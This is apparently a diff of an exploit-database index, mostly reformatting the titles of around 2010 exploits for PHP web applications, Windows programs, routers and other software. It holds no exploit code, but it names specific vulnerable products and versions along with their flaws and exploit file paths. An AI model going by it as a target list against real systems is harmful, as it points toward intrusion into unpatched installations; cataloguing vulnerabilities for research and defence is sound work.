-11431,platforms/php/webapps/11431.txt,"MRW PHP Upload Remote file upload",2010-02-13,Phenom,php,webapps,0 +11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Remote file upload",2010-02-13,Phenom,php,webapps,0 11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 @@ -10480,7 +10480,7 @@ id,file,description,date,author,platform,type,port 11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery - SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 -11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 +11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 @@ -10494,7 +10494,7 @@ id,file,description,date,author,platform,type,port 11463,platforms/php/webapps/11463.txt,"Joomla Component com_joomportfolio - Blind Injection",2010-02-15,snakespc,php,webapps,0 11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare - SQL Injection",2010-02-15,snakespc,php,webapps,0 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0 -11466,platforms/php/webapps/11466.txt,"microUpload Shell Upload",2010-02-15,Phenom,php,webapps,0 +11466,platforms/php/webapps/11466.txt,"microUpload - Shell Upload",2010-02-15,Phenom,php,webapps,0 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service (0Day)",2010-02-15,"Jason Bowes",ios,dos,0 11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF",2010-02-15,dookie,windows,remote,21 11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 @@ -10527,7 +10527,7 @@ id,file,description,date,author,platform,type,port 11498,platforms/php/webapps/11498.txt,"Joomla Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote BoF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0 -11502,platforms/php/webapps/11502.txt,"phpAutoVideo CSRF",2010-02-19,GoLdeN-z3r0,php,webapps,0 +11502,platforms/php/webapps/11502.txt,"phpAutoVideo - CSRF",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF / XSS",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 11507,platforms/php/webapps/11507.txt,"WSC CMS - (Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0 @@ -10536,7 +10536,7 @@ id,file,description,date,author,platform,type,port 11511,platforms/php/webapps/11511.txt,"Joomla Component com_communitypolls 1.5.2 - LFI",2010-02-19,kaMtiEz,php,webapps,0 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,"ViRuSMaN ",php,webapps,0 11516,platforms/php/webapps/11516.html,"TimeClock 0.99 - CSRF Remote Add Admin Exploit",2010-02-20,"ViRuSMaN ",php,webapps,0 -11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure",2010-02-20,"ViRuSMaN ",php,webapps,0 +11517,platforms/php/webapps/11517.txt,"Netzbrett - Database Disclosure",2010-02-20,"ViRuSMaN ",php,webapps,0 11518,platforms/php/webapps/11518.txt,"Softbiz Jobs - (news_desc) SQL Injection",2010-02-22,BAYBORA,php,webapps,0 11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0 @@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port 11539,platforms/windows/remote/11539.py,"Easy FTP Server 1.7.0.2 - CWD Remote BoF",2010-02-22,athleet,windows,remote,0 11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - (.wav) Local Crash Exploit",2010-02-22,v3n0m,windows,dos,0 11541,platforms/windows/dos/11541.pl,"E.M. Total Video Player 1.31 - (.avi) Local Crash PoC",2010-02-22,diving,windows,dos,0 -11543,platforms/php/webapps/11543.txt,"Softbiz Jobs CSRF",2010-02-23,"pratul agrawal",php,webapps,0 +11543,platforms/php/webapps/11543.txt,"Softbiz Jobs - CSRF",2010-02-23,"pratul agrawal",php,webapps,0 11544,platforms/php/webapps/11544.php,"Joomla Component com_ice - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0 11546,platforms/hardware/dos/11546.py,"iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC",2010-02-23,b0telh0,hardware,dos,0 11547,platforms/php/webapps/11547.txt,"Php Auktion Pro SQL - (news.php) SQL Injection",2010-02-23,"Easy Laster",php,webapps,0 @@ -10570,9 +10570,9 @@ id,file,description,date,author,platform,type,port 11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos,0 11553,platforms/php/webapps/11553.txt,"Tinypug 0.9.5 - CSRF Password Change",2010-02-23,"AmnPardaz ",php,webapps,0 11554,platforms/php/webapps/11554.txt,"QuickDev 4 Php Database Disclosure",2010-02-23,"ViRuSMaN ",php,webapps,0 -11555,platforms/asp/webapps/11555.txt,"bispage Bypass",2010-02-23,SaMir-BonD,asp,webapps,0 +11555,platforms/asp/webapps/11555.txt,"bispage - Bypass Exploit",2010-02-23,SaMir-BonD,asp,webapps,0 11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang - Remote Denial of Service",2010-02-23,Ale46,hardware,dos,0 -11557,platforms/php/webapps/11557.txt,"Max's Photo Album Shell Upload",2010-02-24,indoushka,php,webapps,0 +11557,platforms/php/webapps/11557.txt,"Max's Photo Album - Shell Upload",2010-02-24,indoushka,php,webapps,0 11558,platforms/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross-Site Scripting",2010-02-24,indoushka,php,webapps,0 11559,platforms/php/webapps/11559.txt,"Article Friendly - CSRF",2010-02-24,"pratul agrawal",php,webapps,0 11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 @@ -10601,13 +10601,13 @@ id,file,description,date,author,platform,type,port 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 -11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0 +11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0 11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11595,platforms/php/webapps/11595.php,"Joomla Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps,0 11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0 -11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0 +11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11601,platforms/windows/dos/11601.pl,"Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 @@ -10616,13 +10616,13 @@ id,file,description,date,author,platform,type,port 11604,platforms/php/webapps/11604.php,"Joomla Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Auth Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 -11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 +11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 - ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - (id) SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 -11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download",2010-03-02,indoushka,asp,webapps,0 +11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload",2010-03-02,indoushka,php,webapps,0 -11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload",2010-03-02,indoushka,php,webapps,0 +11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Shell Upload",2010-03-02,indoushka,php,webapps,0 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus ",win_x86,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum - contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash Exploit (0Day)",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 @@ -10630,7 +10630,7 @@ id,file,description,date,author,platform,type,port 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal - index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload",2010-03-03,indoushka,php,webapps,0 11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,"cr4wl3r ",php,webapps,0 -11622,platforms/windows/dos/11622.php,"Opera 10.50 integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 +11622,platforms/windows/dos/11622.php,"Opera 10.50 - integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution Exploit",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 @@ -10639,8 +10639,8 @@ id,file,description,date,author,platform,type,port 11630,platforms/windows/dos/11630.pl,"WinSmMuPl 1.2.5 - (.mp3) Local Crash PoC",2010-03-04,"cr4wl3r ",windows,dos,0 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11632,platforms/windows/dos/11632.txt,"Orb 2.0.01.0049 < 2.54.0018 - DirectShow DoS",2010-03-04,"Matthew Bergin",windows,dos,0 -11633,platforms/hardware/dos/11633.pl,"Sagem Routers Remote Reset Exploit",2010-03-04,AlpHaNiX,hardware,dos,0 -11634,platforms/hardware/webapps/11634.pl,"Sagem Routers Remote Auth bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 +11633,platforms/hardware/dos/11633.pl,"Sagem Routers - Remote Reset Exploit",2010-03-04,AlpHaNiX,hardware,dos,0 +11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Auth bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"ONECMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 11637,platforms/php/webapps/11637.txt,"auktionshaus 3.0.0.1 - news.php (id) SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 @@ -10654,7 +10654,7 @@ id,file,description,date,author,platform,type,port 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 -11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 +11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - .m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - (id) news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - (.zip) Local Universal Buffer Overflow PoC Exploit (0Day)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 @@ -10697,7 +10697,7 @@ id,file,description,date,author,platform,type,port 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - (topic.php) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script - news.php (id) SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 -11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 +11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - (.stats) Stack Buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 @@ -10722,7 +10722,7 @@ id,file,description,date,author,platform,type,port 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80 -14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 +14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook - SQL Injection",2010-03-14,snakespc,php,webapps,0 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0 11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0 @@ -10730,7 +10730,7 @@ id,file,description,date,author,platform,type,port 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0 11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0 -11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389 +11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Auth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0 11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 @@ -10779,11 +10779,11 @@ id,file,description,date,author,platform,type,port 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0 11787,platforms/windows/local/11787.py,"Adobe Reader PDF - LibTiff Integer Overflow Code Execution",2010-03-17,villy,windows,local,0 -11788,platforms/php/webapps/11788.txt,"PHP-Nuke ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps,0 -11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 +11788,platforms/php/webapps/11788.txt,"PHP-Nuke - ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps,0 +11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 -11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 +11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"MediaCoder - (.lst) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 @@ -10803,7 +10803,7 @@ id,file,description,date,author,platform,type,port 11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php BLIND SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 -11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 +11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 @@ -10821,7 +10821,7 @@ id,file,description,date,author,platform,type,port 11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 - (Auth Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage - (index.php) SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 -11837,platforms/php/webapps/11837.txt,"Uiga Fan Club SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 +11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - index.php (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 @@ -10837,8 +10837,8 @@ id,file,description,date,author,platform,type,port 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Auth Bypass",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - NULL Pointer PoC",2010-03-23,"Salvatore Fresta",multiple,dos,0 -11856,platforms/multiple/remote/11856.txt,"uhttp Server Path Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 -11857,platforms/windows/remote/11857.c,"MX Simulator Server Remote Buffer Overflow PoC",2010-03-23,"Salvatore Fresta",windows,remote,0 +11856,platforms/multiple/remote/11856.txt,"uhttp Server - Path Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 +11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow PoC",2010-03-23,"Salvatore Fresta",windows,remote,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - (.mp3) Local Crash PoC",2010-03-24,chap0,windows,dos,0 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv - (index.php) SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 @@ -10847,7 +10847,7 @@ id,file,description,date,author,platform,type,port 11866,platforms/php/webapps/11866.txt,"New CMS - Local File Inclusion",2010-03-24,Xash,php,webapps,0 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 -11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 Title XSS",2010-03-24,FormatXformat,php,webapps,0 +11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 - Title XSS",2010-03-24,FormatXformat,php,webapps,0 11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow Method 2",2010-03-25,sinn3r,windows,local,0 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS - SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 @@ -10856,7 +10856,7 @@ id,file,description,date,author,platform,type,port 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 -11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 +11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta - (/photo.php) SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusion",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 @@ -10931,7 +10931,7 @@ id,file,description,date,author,platform,type,port 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic - Auth Bypass",2010-03-30,indoushka,php,webapps,0 -11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 +11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0Day) (1)",2010-03-30,"Richard leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 @@ -10960,13 +10960,13 @@ id,file,description,date,author,platform,type,port 12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Upload Shell",2010-04-01,indoushka,php,webapps,0 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS - XSS / SQL Injection",2010-04-01,Valentin,php,webapps,0 12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0 -12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 -12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload",2010-04-01,indoushka,php,webapps,0 +12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 +12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Remote Upload",2010-04-01,indoushka,php,webapps,0 